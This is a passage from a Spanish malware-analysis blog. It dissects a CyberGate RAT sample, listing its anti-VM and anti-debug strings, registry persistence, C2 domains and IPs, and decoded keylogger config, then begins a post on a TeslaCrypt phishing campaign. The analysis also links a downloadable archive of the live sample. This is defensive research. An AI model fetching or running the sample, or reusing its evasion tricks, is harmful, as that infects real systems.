<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbD67RPBWIXqTAUKXSC6jFu4yy59bxSEFgqAxDIV8nzPEc5EJr9YBIDDwZk0dP7ezIR4ruogmwAxINZJVV1FRpvnU83ClbkNzyspWLp_CRYfafO6t3uxVdVH_2TVNzYGueeoC3Vcdsr4/s1600/02.JPG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbbD67RPBWIXqTAUKXSC6jFu4yy59bxSEFgqAxDIV8nzPEc5EJr9YBIDDwZk0dP7ezIR4ruogmwAxINZJVV1FRpvnU83ClbkNzyspWLp_CRYfafO6t3uxVdVH_2TVNzYGueeoC3Vcdsr4/s400/02.JPG" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Contiene una capa de Crypter básica pero efectiva, solo 8 antivirus lo reconocían.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6xv6w8uekw81jAh3Q7nQqb1GaSrfjMzWK78RSQKzO4t-1rfyR3kyWStmUdq5UU7ZORN8vL2WfQx58HP3GMuU4DY80PCfnXTa5GjjmfDw8aMIirDtYRv0uP9I2Ww6X3TuGJelg2FDsg8s/s1600/vt.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6xv6w8uekw81jAh3Q7nQqb1GaSrfjMzWK78RSQKzO4t-1rfyR3kyWStmUdq5UU7ZORN8vL2WfQx58HP3GMuU4DY80PCfnXTa5GjjmfDw8aMIirDtYRv0uP9I2Ww6X3TuGJelg2FDsg8s/s1600/vt.jpg" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Dumpeamos con bp en WriteVirtualMemory</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq3cIUFUPDce7lMM8TKscY1ETfV9WOShdrFElpUARbX185kV4R7UDrFnZJuF7n_xE8IcxwvQyUJlraIzXlugmo3eVJAGZEQXK_Keo73oDWdhZNZFiIbXBREyXte9siSVxGFGH8uVUuyBE/s1600/01.JPG" imageanchor="1"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq3cIUFUPDce7lMM8TKscY1ETfV9WOShdrFElpUARbX185kV4R7UDrFnZJuF7n_xE8IcxwvQyUJlraIzXlugmo3eVJAGZEQXK_Keo73oDWdhZNZFiIbXBREyXte9siSVxGFGH8uVUuyBE/s640/01.JPG" width="640" /></a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ahora sin la capa del Crypter la cosa cambia y es detectado por mas A.V.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2FCGHLB8NV4i7mq4sI65a3T0FBVwtJleZoLo7TUn18k89HVALylrDbsOI6obZv6TCyhJv4wNnzRATgvh1c3MlCz9kl8XrHN6JL6nrScg5zb9UVi7DJKswK6wN8iaUR2eKDmtTE4BSf-A/s1600/vt2.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2FCGHLB8NV4i7mq4sI65a3T0FBVwtJleZoLo7TUn18k89HVALylrDbsOI6obZv6TCyhJv4wNnzRATgvh1c3MlCz9kl8XrHN6JL6nrScg5zb9UVi7DJKswK6wN8iaUR2eKDmtTE4BSf-A/s1600/vt2.jpg" /></a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Strings Interesantes:</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Anti-VM</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407AB3 MOV EAX,1.00407B40 ASCII "VBoxService.exe"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B40 ASCII "VBoxService.exe",0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B53 PUSH 1.00407B68 ASCII "SbieDll.dll"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B68 ASCII "SbieDll.dll",0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B77 PUSH 1.00407B8C ASCII "dbghelp.dll"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407B8C ASCII "dbghelp.dll",0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407BA6 PUSH 1.00407C00 ASCII "Software\Microsoft\Windows\CurrentVersion"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407BCF PUSH 1.00407C2C ASCII "ProductId"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00407BE2 CMP EAX,1.00407C38 ASCII "55274-640-2673064-23950"</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Anti-Debugging</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
00407EA6 PUSH 1.00407ED4 ASCII "IsDebuggerPresent"</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408798 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">004087E1 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040880F MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408858 MOV EDX,1.004089E0 ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408890 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">004088D9 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">00408911 MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">0040895A MOV EDX,1.00408A28 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">004089D4 ASCII "\",0</span></div>
</div>
<div>
<br /></div>
</div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">En el analisis Dinámico vemos donde se conecta y su persistencia en el sistema.</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Archivo Oculto:</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6iHMjcDCFdhFUyKZ4fz-h5FiqYOcyJiwn0gl9HS5gr0Y4-hiw7ZFs1rMEQVn-o8Zu70K96NSNLXy2tdtMZc0PFN5vZVIb0e6qR6_Aie4vQep64lzZsi39rp8tjA9XxfAjoSlK1JaXhDw/s1600/03.jpg" imageanchor="1"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHJGK962yp7aAHbPc_6b5l1gWvqO6LHvOouAfz5LwqZpmhIDDOxYhgE4QEzDC773D7e9aPeoMCC-Imijhlvv1dixNIseCHcjaXUHLYPqTHY1sGYAgobVspzFiMmhr0KpMg6hNQPUGnykw/s1600/04.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHJGK962yp7aAHbPc_6b5l1gWvqO6LHvOouAfz5LwqZpmhIDDOxYhgE4QEzDC773D7e9aPeoMCC-Imijhlvv1dixNIseCHcjaXUHLYPqTHY1sGYAgobVspzFiMmhr0KpMg6hNQPUGnykw/s1600/04.jpg" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6iHMjcDCFdhFUyKZ4fz-h5FiqYOcyJiwn0gl9HS5gr0Y4-hiw7ZFs1rMEQVn-o8Zu70K96NSNLXy2tdtMZc0PFN5vZVIb0e6qR6_Aie4vQep64lzZsi39rp8tjA9XxfAjoSlK1JaXhDw/s1600/03.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6iHMjcDCFdhFUyKZ4fz-h5FiqYOcyJiwn0gl9HS5gr0Y4-hiw7ZFs1rMEQVn-o8Zu70K96NSNLXy2tdtMZc0PFN5vZVIb0e6qR6_Aie4vQep64lzZsi39rp8tjA9XxfAjoSlK1JaXhDw/s1600/03.jpg" /></a></div>
<div style="text-align: left;">
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">Network Traffic</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: x-small;">DNS Requests</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">unshowmas.ddns.net<span class="Apple-tab-span" style="white-space: pre;"> </span>181.131.80.198<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">analaloca.chickenkiller.com<span class="Apple-tab-span" style="white-space: pre;"> </span>181.131.80.198<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">unshowmas.no-ip.biz<span class="Apple-tab-span" style="white-space: pre;"> </span>181.131.80.198<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Contacted Hosts</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">191.90.223.133<span class="Apple-tab-span" style="white-space: pre;"> </span>3460<span class="Apple-tab-span" style="white-space: pre;"> </span>TCP<span class="Apple-tab-span" style="white-space: pre;"> </span>Colombia</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">El RAT se inyecta en un proceso Firefox.exe, haciendo un dump de este proceso y luego volcando los strings encontramos lo siguiente:</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">(para esto podemos utilizar la suite de sysinternals)</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
unshowmas.no-ip.biz</div>
<div>
ALOCA.CHICKENKILLER.COM</div>
<div>
unshowmas.no-ip.biz</div>
<div>
stem\CurrentControlSet\Services\Tcpip\Parameters</div>
<div>
cybergate</div>
<div>
<br /></div>
<div>
CyberGate </div>
<div>
v1.18.0 - Trial version</div>
<div>
.txt</div>
<div>
<br /></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Ya sabemos que es el troyano RAT Cybergate, por lo que podemos correr un decoder del config para ver que datos obtenemos.</span></div>
<div>
<br /></div>
<div>
https://github.com/kevthehermit/RATDecoders/blob/master/CyberGate.py</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"><br /></span></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Activate Keylogger<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Active X Startup<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: {O8WU086S-76RM-CBK3-8KVD-3P1LU050V080}</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Change Creation Date<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: CyberGate Version<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Domain<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: analaloca.chickenkiller.com|unshowmas.ddns.net|unshowmas.no-ip.biz|</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Enable Message Box<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: FALSE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Address<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: ftp.server.com</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Directory<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: ./logs</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Interval<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 30</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Password<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: password</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP Port<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 21</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: FTP UserName<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: ftp_user</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Google Chrome Passwords<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Hide File<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Directory<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: install</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install File Name<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: logonwindows.exe</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Flag<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Message Box<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: Remote Administration anywhere in the world.</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Install Message Title<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: CyberGate</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Keylogger Backspace = Delete<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Keylogger Enable FTP<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: FALSE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Melt File<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Message Box Button<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 0</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Message Box Icon<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 16</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Mutex<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: J00OO266V861S3</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: P2P Spread<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Password<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: cybergate</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Persistance<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: TRUE</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Port<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: 3460|3460|3460|</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Process Injection<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: Disabled</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: REG Key HKCU<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: HKCU</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: REG Key HKLM<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: HKLM</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: ServerID<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: FOTO</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: Startup Policies<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: Policies</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Key: USB Spread<span class="Apple-tab-span" style="white-space: pre;"> </span> Value: </span></div>
</div>
<div>
<br /></div>
<div>
<br /></div>
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">La ingeniería social a la orden del día y los .... curiosos...</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Muestra: </span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://www.dropbox.com/s/xk35wu39i3v2n3k/Malware%20-%20cybergate-16-12-15.rar?dl=0</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Eso es todo por el momento.</span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">@Dkavalanche 2015</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1QZRWItGrF8h3ZwbczZvi8Kj8avVWazjcKWvBJuTb6VQhXo3aXrHTu43hcwhnSgRUsFAMsPOp2lKyGp8sBM4aPFdtpeNdehirNkfW5wKw80o_QQW8UyF0oH2diXx2Ec59jg4a108s2W8/s1600/descarga.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1QZRWItGrF8h3ZwbczZvi8Kj8avVWazjcKWvBJuTb6VQhXo3aXrHTu43hcwhnSgRUsFAMsPOp2lKyGp8sBM4aPFdtpeNdehirNkfW5wKw80o_QQW8UyF0oH2diXx2Ec59jg4a108s2W8/s400/descarga.jpg" /></a></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-40172357877687745242015-12-10T06:45:00.000-08:002015-12-10T06:45:39.540-08:00<br />
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><b>Campaña de Ransomware: TeslaCrypt</b></span></span><div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">En el día de ayer me llego un correo phishing con un regalo desagradable, un encriptor de datos.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span><div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Los correos maliciosos llegan con un adjunto .zip con un javascript codificado en su interior.</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Your order #39203250 - Corresponding Invoice #1AF14884</span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwiEwfPue46jzxjwzXHoduyZXDY1yXWrQlyEbhPaUPhaptY4gU3fFqrQEhCwsIM_g2xWcvu831Go_zTetZxSnPdgQBZ2dzFsorPbtbnLgT9Hxhw9k66RAGI2RRgZdoEyGCaNhST1FhCY/s1600/fake.png" imageanchor="1"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTwiEwfPue46jzxjwzXHoduyZXDY1yXWrQlyEbhPaUPhaptY4gU3fFqrQEhCwsIM_g2xWcvu831Go_zTetZxSnPdgQBZ2dzFsorPbtbnLgT9Hxhw9k66RAGI2RRgZdoEyGCaNhST1FhCY/s640/fake.png" width="640" /></a></span></span></div>
<span style="font-family: inherit;"><span style="color: #222222;"><br /></span><span style="color: #222222;">JavaScript Ofuscado.</span></span><br />
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhpndSQ6nUxiI_9adYLrEGVLP3hUbSapYy-Pq2HQU-Q8_WZ8m0h8YF40PXvWTcirjydLLyhSDieCc6CfHmhXkqT5l0BcE4JRVulxKbtTF85njCpRTqvsv75CZvALFfB7-skVqBag0pxE/s1600/invoiceJS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhpndSQ6nUxiI_9adYLrEGVLP3hUbSapYy-Pq2HQU-Q8_WZ8m0h8YF40PXvWTcirjydLLyhSDieCc6CfHmhXkqT5l0BcE4JRVulxKbtTF85njCpRTqvsv75CZvALFfB7-skVqBag0pxE/s320/invoiceJS.png" width="320" /></a></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;">Al ejecutarlo descarga y ejecuta un .exe </span></span></div>
<div>
<span style="color: #222222; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh8j8G-fwQH-SFc-oNHyg4pSLYDMJX6e96F1uBp4YuAS_Wz6tBCYA7cbq-XFCE4m5O7T5zlCdPv8yTAnWAhyphenhyphenaIzpYccwsG1qom92y84FOoDOh_RFSlCyV4D3t37E6s-Gqmo7p45aj5xKw/s1600/333.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh8j8G-fwQH-SFc-oNHyg4pSLYDMJX6e96F1uBp4YuAS_Wz6tBCYA7cbq-XFCE4m5O7T5zlCdPv8yTAnWAhyphenhyphenaIzpYccwsG1qom92y84FOoDOh_RFSlCyV4D3t37E6s-Gqmo7p45aj5xKw/s400/333.png" /></a></div>
<div>
<span style="color: #222222;"><div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;">http://urlquery.net/report.php?id=1449670303414</span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;"><br /></span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;">Análisis de la amenaza en VT </span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;"><br /></span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;">https://www.virustotal.com/es-ar/file/832b72759899c9b6c4aa41afc8640d37a7be7c60797bcd120a019b867d8fa492/analysis/</span></div>
<div style="font-family: Arial, Helvetica, sans-serif;">
<span style="font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpT34_O-OzFtdcnjO2igAzT5bxAl8PpVJXnmfbPK1VBgSK92lQfkeLWhQMTP3hKnTKhbAcwOFlI7mdF9O9ehV84IxYitpFJ7uaFdQqzcsiekzUFyn2AudRT8KIXqotGW6RwMXrltrA8Cs/s1600/vt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpT34_O-OzFtdcnjO2igAzT5bxAl8PpVJXnmfbPK1VBgSK92lQfkeLWhQMTP3hKnTKhbAcwOFlI7mdF9O9ehV84IxYitpFJ7uaFdQqzcsiekzUFyn2AudRT8KIXqotGW6RwMXrltrA8Cs/s320/vt.png" width="320" /></a></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, Helvetica, sans-serif; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
